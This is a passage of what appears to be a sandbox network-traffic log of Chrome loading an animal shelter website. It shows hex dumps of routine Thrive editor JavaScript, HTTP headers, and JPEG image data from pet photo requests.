                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2c 75 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74 79 6c 65 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 6e 2e 66 69 6e 64 28 22 2e 74 63 62 2d 6d 61 73 6f 6e 72 79 22 29 2e 6d 61 73 6f 6e 72 79 28 29 29 2c 31 65 33 29 3b 65 6c 73 65 7b 69 66 28 61 2e 65 6e 73 75 72 65 48 61 6d 62 75 72 67 65 72 4c 6f 67 6f 53 70 6c 69 74 28 6e 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 63 62 2d 6d 61 73 6f 6e 72 79 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 3b 65 2e 64 61 74 61 28 22 6d 61 73 6f 6e 72 79 22 29 26 26 65 2e 6d 61 73 6f 6e 72
                                                                                                                                                                                                                                                        Data Ascii: ,n.find(".tve-m-expanded").removeClass("tve-m-expanded"),u.removeAttr("style"),setTimeout((()=>n.find(".tcb-masonry").masonry()),1e3);else{if(a.ensureHamburgerLogoSplit(n),n.find(".tcb-masonry").each((function(){const e=t(this);e.data("masonry")&&e.masonr
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 68 61 73 43 6c 61 73 73 28 22 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 2d 69 63 6f 6e 2d 61 76 61 69 6c 61 62 6c 65 22 29 7c 7c 65 2e 61 70 70 65 6e 64 28 65 2e 66 69 6e 64 28 22 2e 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 22 29 2e 63 6c 6f 6e 65 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 22 29 29 2e 61 64 64 43 6c 61 73 73 28 22 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 2d 69 63 6f 6e 2d 61 76 61 69 6c 61 62 6c 65 20 22 29 7d 72 65 74 75 72 6e 20 6c 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 2c 74 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74 79
                                                                                                                                                                                                                                                        Data Ascii: hasClass("close-offscreen-icon-available")||e.append(e.find(".tcb-icon-close").clone().removeClass("tcb-icon-close").addClass("tcb-icon-close-offscreen")).addClass("close-offscreen-icon-available ")}return l.toggleClass("tve-m-expanded",t).removeAttr("sty
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 49 6e 74 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 66 66 73 63 72 65 65 6e 2d 77 69 64 74 68 2d 73 65 74 75 70 22 29 29 29 7b 6c 65 74 20 65 3d 74 2e 63 73 73 28 22 6d 61 78 2d 77 69 64 74 68 22 29 3b 28 65 2e 69 6e 63 6c 75 64 65 73 28 22 25 22 29 7c 7c 22 6e 6f 6e 65 22 3d 3d 3d 65 29 26 26 28 65 3d 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 29 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2c 70 61 72 73 65 49 6e 74 28 65 29 29 7d 63 3d 60 6c 65 66 74 3a 20 24 7b 70 61 72 73 65 49 6e 74 28 72 2e 6c 65 66 74 2d 6c 2e 6c 65 66 74 2d 6f 2f 32 2b 61 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2f 32 29 7d 70 78 3b 72 69 67 68 74 3a 75 6e 73 65 74 3b 60 7d 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 4d 65 6e 75 50 6f 73 69 74 69 6f 6e 61 6c 50 61 72 65 6e 74 3a 65 3d 3e 65
                                                                                                                                                                                                                                                        Data Ascii: Int(e.attr("data-offscreen-width-setup"))){let e=t.css("max-width");(e.includes("%")||"none"===e)&&(e=t.outerWidth()),o=Math.min(o,parseInt(e))}c=`left: ${parseInt(r.left-l.left-o/2+a.outerWidth()/2)}px;right:unset;`}return c},getMenuPositionalParent:e=>e
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 29 2e 6c 65 6e 67 74 68 29 7b 6f 2e 66 69 6e 64 28 22 2e 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 22 29 2e 72 65 6d 6f 76 65 28 29 3b 63 6f 6e 73 74 20 65 3d 74 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 22 3e 3c 2f 64 69 76 3e 27 29 3b 65 2e 61 70 70 65 6e 64 28 6e 2e 63 68 69 6c 64 72 65 6e 28 29 29 2c 6f 2e 66 69 6e 64 28 22 2e 74 68 72 69 76 65 2d 73 68 6f 72 74 63 6f 64 65 2d 68 74 6d 6c 22 29 2e 70 72 65 70 65 6e 64 28 65 29 7d 7d 2c 65 6e 73 75 72 65 52 65 67 75 6c 61 72 4c 6f 67 6f 53 70 6c 69 74 28 65 29 7b 63 6f 6e 73 74 20 74 3d 73 28 65 29 2c 6e 3d 74 2e 66 69 6e 64 28 22 2e 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 20 2e 74 63 62 2d 6c 6f 67 6f 22 29 2c 6f 3d 74 2e
                                                                                                                                                                                                                                                        Data Ascii: ).length){o.find(".tcb-hamburger-logo").remove();const e=t('<div class="tcb-hamburger-logo"></div>');e.append(n.children()),o.find(".thrive-shortcode-html").prepend(e)}},ensureRegularLogoSplit(e){const t=s(e),n=t.find(".tcb-hamburger-logo .tcb-logo"),o=t.


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        81192.168.2.44983613.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC388OUTGET /photos/352/e9dac8f4-5d42-4282-b360-1c17bf4033f7.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 66989
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 Nov 2024 16:59:50 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD07293FEE5917
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: c5dc897e-e01e-0033-483a-629734000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015914Z-156796c549b8j89lhC1EWRyyp800000017bg00000000171p
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC15830INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 02 30 01 a4 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                                                                                                                        Data Ascii: JFIF``0"}!1AQa"q2#BR
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: 39 68 3d 9f 73 66 9c 26 18 c0 f4 aa c7 39 a3 3e f5 76 32 b9 72 39 4e 0e 31 4d de c0 e7 38 f6 15 58 b1 ed c5 19 6f 7a 2c 17 34 6d 2e 56 39 39 3f 8d 6e c1 2e f1 f7 b3 f4 ae 47 bd 6d d9 48 cb 10 e2 9a 24 df 8e 60 00 ef 8a b7 04 fe 84 d6 34 52 92 bc 0c 55 b8 27 c0 ce 3f 5a a1 1b 5e 76 e0 2b 63 49 8c 6a ea b0 9c fd a6 da 45 78 c8 52 4e d2 79 fc 8e 31 f5 35 cb 7d ac 8e 84 67 de ba 9f 86 fe 22 b1 d2 7c 5f a7 cb a8 13 05 b3 b7 97 24 ab ce dc 9e 09 1e 80 81 5c b8 98 73 d2 7a 1d 38 69 f2 55 4c d7 f1 a4 db af a2 47 da e6 15 e8 83 19 38 c9 fa d7 0b 7d 7e ba 9c 9e 5c 0c 5c 63 00 93 fc b1 5e bf e3 09 b4 ad 6b c4 4c b6 33 41 73 2a 3e d6 11 f1 cf 42 f8 3d 41 18 3c 7a 57 9b 78 a7 43 96 d3 88 e0 c3 03 f3 98 87 0e 3b 1e 3b d7 95 41 ab ea 7b 55 b6 d0 c4 8f 4d b6 ba cd a8 d3
                                                                                                                                                                                                                                                        Data Ascii: 9h=sf&9>v2r9N1M8Xoz,4m.V99?n.GmH$`4RU'?Z^v+cIjExRNy15}g"|_$\sz8iULG8}~\\c^kL3As*>B=A<zWxC;;A{UM
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: 2b 4b 12 6c f8 78 c7 17 9a a5 c8 c3 91 cf 4a bb ad dc c1 05 a9 19 2c 71 f7 8f 51 54 61 b9 b7 d3 cc 8f 71 14 60 3b 31 4c f2 6b 27 5b d6 22 bb 56 58 63 5c 37 f1 d5 58 57 39 bd 5c 2b 4f 11 54 66 06 31 cf 1e a6 a8 ec ff 00 a6 4d fa 54 ba cd f0 82 68 50 ca 01 11 0c f0 7d 4d 50 fe d3 5f f9 ec bf 91 a4 3b 9f 92 f2 81 f5 15 4e 48 81 27 03 f0 ab d2 42 fd 41 cf d6 a1 30 37 7e 2b 8d 1b 33 3e 48 07 5f e5 55 24 52 47 ad 6a 48 99 06 ab bc 1c f2 38 ab 20 cc 29 cf 34 d3 1e 0f 1f 85 5e 7b 61 db ad 30 c4 73 c8 a0 45 65 4e 2a 58 6d 15 d8 06 07 af 55 35 2a c5 8a b3 04 60 f3 8c fd 4d 00 77 7f 0e 8e 91 69 21 59 6d e4 77 eb 97 1b c0 3d b8 1d 6b 77 57 ba fb 2d ec 6d 67 76 f2 02 76 99 2e 38 00 e7 a1 5f f1 ac 0f 00 68 23 54 bb dd 70 d3 08 d4 83 b6 de 32 cc 71 ef d0 57 6f a8 68 90
                                                                                                                                                                                                                                                        Data Ascii: +KlxJ,qQTaq`;1Lk'["VXc\7XW9\+OTf1MThP}MP_;NH'BA07~+3>H_U$RGjH8 )4^{a0sEeN*XmU5*`Mwi!Ymw=kwW-mgvv.8_h#Tp2qWoh
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: bd 3b 8c f6 a6 99 47 23 e2 08 f5 1d 3d 6d ed 65 75 75 64 21 64 cf 2d c6 4e 70 3a e2 a8 5d f8 70 c9 0c 12 5b 4e b3 92 41 0b 27 2b 9e 33 8e fe 9f 95 76 53 e8 97 d0 3b 4d 7b 67 25 d4 72 a0 0a f1 9f 97 24 13 d3 fa 8a c6 d4 ad 2c ef a0 c9 b7 92 ce e1 1b 63 63 85 27 d9 ba ff 00 fa a9 a6 23 8f 7d 52 71 77 2d a4 d1 66 79 88 0a ae 43 2e 41 eb 93 5c 77 88 fc 17 6f 77 77 1c b7 fa 52 5c 94 71 2b 1e 1c 15 cf a5 7a 1d 86 84 c7 59 92 de 6b d6 1b 41 31 b9 39 24 f6 e7 f0 1c 51 af 68 d7 16 c8 76 5c 82 ae 08 56 df ca e3 af 1f 8f 7a b5 2b 12 e2 9e e7 0d 2e 89 e1 fd 52 ca 5b 76 8e 30 e9 95 d9 24 78 65 1c fe 7d ab 97 b2 f8 79 e1 9d 17 51 9a e2 3d 36 0f 2e 45 1b 63 f2 be 65 3d cf 3d 33 5d 7e 9d a3 de 6b 1a 8b d9 b8 31 5c 28 12 3c 80 81 8c f4 c7 7c d6 be a7 a2 cd a4 d9 32 e1 24
                                                                                                                                                                                                                                                        Data Ascii: ;G#=meuud!d-Np:]p[NA'+3vS;M{g%r$,cc'#}Rqw-fyC.A\wowwR\q+zYkA19$Qhv\Vz+.R[v0$xe}yQ=6.Ece==3]~k1\(<|2$
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC2007INData Raw: c3 c2 dd 73 ed 5c ed e5 ad 95 e6 a7 1a bd e4 08 a5 c0 c9 1b 5c 1f 73 d0 8e d5 7f 02 db 55 84 dc 1c c0 00 c3 9e a7 8e e7 f1 ad 7b bf 0b da 5f 24 d2 ac 60 ca 57 72 82 d8 5f a5 2b 0e ea 24 df d9 b6 ff 00 65 51 6c 53 cb 65 2a 76 75 3c 75 c7 7a e3 f5 4f 0d c9 62 19 ad a7 70 c0 fe f2 54 24 f3 8e 2a 5b fd 26 5d 1c 40 e9 23 65 54 33 c6 ae 7e 52 78 e2 ae 5a 6a 33 49 67 22 fc 86 42 db 3c 96 ce f0 c7 8e 4f a5 26 54 74 ea 63 e8 69 73 76 ad 6f 71 24 b2 b6 fc 33 a3 9f 98 77 cd 5c bc d1 97 4e 05 ec cb c4 3c cc 13 26 54 81 8e a0 77 14 40 2e f4 8b 89 6e d9 ed 9c b6 15 ad df b7 6c 8e f8 ad 5b 8f 10 4f 08 fb 3c f6 e3 cc 00 3a 80 d9 51 9f 7e b8 a8 d8 ab 9c dc 73 5e c2 1f f7 c6 48 d5 f8 39 c1 27 db d8 53 ef ae f5 1d 69 4e 98 b2 ec 79 40 38 66 01 4f d7 dc d6 8e a4 ed 2d b4 ab
                                                                                                                                                                                                                                                        Data Ascii: s\\sU{_$`Wr_+$eQlSe*vu<uzObpT$*[&]@#eT3~RxZj3Ig"B<O&Ttcisvoq$3w\N<&Tw@.nl[O<:Q~s^H9'SiNy@8fO-


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        82192.168.2.44983813.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC388OUTGET /photos/352/fe090341-f359-4d15-a7d0-260c04791544.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 57711
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Dec 2024 20:08:35 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD2068EB4A90A1
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: b35178ec-c01e-000b-603a-6233f4000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015914Z-156796c549b97fdkhC1EWRd3rw00000016dg000000004r0g
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC15830INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 02 30 01 a4 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                                                                                                                        Data Ascii: JFIF,,0"}!1AQa"q2#BR
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: 85 ed b4 ba dd ec f7 97 37 91 29 2d f7 df 2a 80 7d 4e 33 f8 0a f4 4f 1e eb 36 72 e9 8e 90 59 1b 32 78 f3 e7 94 bf e4 bd cd 79 51 b8 8e 39 4b c7 fb d6 1c 79 b3 ff 00 41 db e9 5d 11 d8 f2 f1 16 e6 b2 2d bd 95 a4 48 c5 75 05 91 b3 85 11 23 10 de f5 5f 2b 6c 43 93 2b 90 78 e3 14 b3 6a 57 7e 62 c6 f2 bb 2e 38 5d de 58 fd 29 97 8c 8d b5 96 61 b4 2f 21 73 81 f9 d6 87 21 7a cf c7 1a 9d 9c c9 f6 62 48 5e 00 7f 9b 8f c4 71 5e c5 f0 97 c4 5a 96 b5 a9 04 1a a2 5a 34 98 0d 1c 90 a3 26 3a 1c 94 e9 eb f7 7f 1a f1 bd 08 4c d2 07 10 79 d1 67 db 38 f5 03 a9 af 5d f0 9f 8b ef 74 a2 22 b4 93 4c b7 71 83 18 bb b6 48 dc 37 71 92 40 39 fa d0 07 a1 fc 47 d1 ef 2f 3c 35 39 d3 a5 4b d8 c2 91 2a c7 2e d8 f8 c0 ce 36 8e 0f 1e b8 af 92 75 ad 3a 4b 4b b9 1e 42 b1 06 38 0a 92 79 98 f6
                                                                                                                                                                                                                                                        Data Ascii: 7)-*}N3O6rY2xyQ9KyA]-Hu#_+lC+xjW~b.8]X)a/!s!zbH^q^ZZ4&:Lyg8]t"LqH7q@9G/<59K*.6u:KKB8y
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: e4 76 5a 37 87 74 ff 00 05 69 72 5f 6a 61 5e 5d bf c4 00 c1 ec 05 79 f6 bf ae 4d ae ea 2f 73 23 2a ae e0 a8 aa 4e 02 fb 57 41 ae 7c 4c 1a c4 6d 6b 75 a7 24 f0 0f 99 4a b8 61 8e cd 9a e4 9a 3b 0b ab c4 5b 79 9e d9 fe f2 c7 31 f9 54 fd 45 78 39 4d 3a d8 7a b3 c5 63 e0 dc df 5d d2 5f 2d 8f 3b 10 e3 34 a1 45 e8 46 11 9f 7a 0d a7 03 fe fa f7 aa 52 42 b6 f2 09 96 25 7d dc 96 90 02 38 ec 45 74 0d e1 ed 5c 5d a4 9f 66 91 d0 9c 06 56 ce e2 47 6f 6a 92 3f 05 eb 1a a4 a1 63 b3 95 4a 9c 33 3a e1 7f 0a fa af ed 4c 17 2f 33 aa be f3 83 d8 d4 bd b9 59 83 65 72 f1 43 74 b0 0f 24 4e 77 48 90 a8 0b f5 20 57 2d aa 4f a7 dc eb 48 b7 d6 42 ec 41 b5 a2 46 6f 95 64 0d 90 71 d3 b5 7b 4a 7c 3e b0 d0 2d 4d de bd 7a 90 46 80 bb 45 17 de c0 1c fd 4d 79 74 96 3a 37 88 bc 43 79 7d 75
                                                                                                                                                                                                                                                        Data Ascii: vZ7tir_ja^]yM/s#*NWA|Lmku$Ja;[y1TEx9M:zc]_-;4EFzRB%}8Et\]fVGoj?cJ3:L/3YerCt$NwH W-OHBAFodq{J|>-MzFEMyt:7Cy}u
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC9113INData Raw: 47 18 f2 fe f6 3d 49 f7 ad ff 00 0d 7c 3b be d4 f0 b7 a8 d6 fb 5f 76 d6 23 e6 5f 4a f4 7d 2f 4b d2 7c 11 69 24 70 c4 8f 70 46 e2 dd 4e 7b e0 d7 81 98 f1 05 0b 3c 3e 19 7b 49 bd 34 d8 e8 a3 84 9b f7 e7 a2 47 63 a6 44 f7 3a 6c 29 2e dd f8 05 f7 f3 b4 76 1e e6 b8 5f 1f ea 33 78 4c 15 b2 82 26 46 39 24 2f 4f 7f 6a e8 3c 3f e2 30 6e d1 ae 5c 9d e0 90 8a 08 0b f8 f7 ad bf 13 e8 76 be 22 d2 dd 56 25 3b 87 46 3c 93 eb 5f 96 c6 13 cb b1 91 58 b8 7b af 75 d0 fa 06 d5 7a 4f d9 bd 4f 9d af bc 75 ab df 06 5d eb 01 63 f2 63 03 e5 ac b9 fc 55 aa 87 00 dd 4b 24 80 8d c9 1f 23 1f 5a bd ab 68 e7 49 be b9 b3 2c a3 68 e7 cc 03 77 1e 9e d5 8c f6 a3 cb ce e5 19 04 fc 8d cf e3 ed 5f b7 61 f0 58 2a 94 94 e9 d3 56 7e 47 ca ca ad 55 26 a5 26 5e b5 f1 c4 91 97 37 16 c8 ee 0f cd 23
                                                                                                                                                                                                                                                        Data Ascii: G=I|;_v#_J}/K|i$ppFN{<>{I4GcD:l).v_3xL&F9$/Oj<?0n\v"V%;F<_X{uzOOu]ccUK$#ZhI,hw_aX*V~GU&&^7#


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        83192.168.2.449845192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC455OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC672INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 6198
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC697INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 37 32 34 38 34 3a 28 74 2c 65 2c 6f 29 3d 3e 7b 28 28 65 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 6f 28 32 31 37 31 35 29 2c 61 3d 6f 28 34 34 32 38 31 29 2c 69 3d 7b 69 6e 69 74 3a 28 29 3d 3e 7b 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61 67 65 28 29 7c 7c 28 65 28 22 2e 74 68 72 76 5f 73 6f 63 69 61 6c 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 22 29 2e 65 61 63 68 28 28 28 74 2c 6f 29 3d 3e 69 2e 69 6e 69 74 55 49 28 65 28 6f 29 29 29 29 2c 69 2e 69 6e 69 74 42 75 74 74 6f 6e 73 28 29 2c 65 28 22 62 6f 64 79 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 3a 6e 6f 74 28 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 66
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var t={72484:(t,e,o)=>{((e,n)=>{const s=o(21715),a=o(44281),i={init:()=>{TCB_Front.Utils.isEditorPage()||(e(".thrv_social.thrv_social_custom").each(((t,o)=>i.initUI(e(o)))),i.initButtons(),e("body").on("click",".thrv_social_custom:not(.thrv_social_f
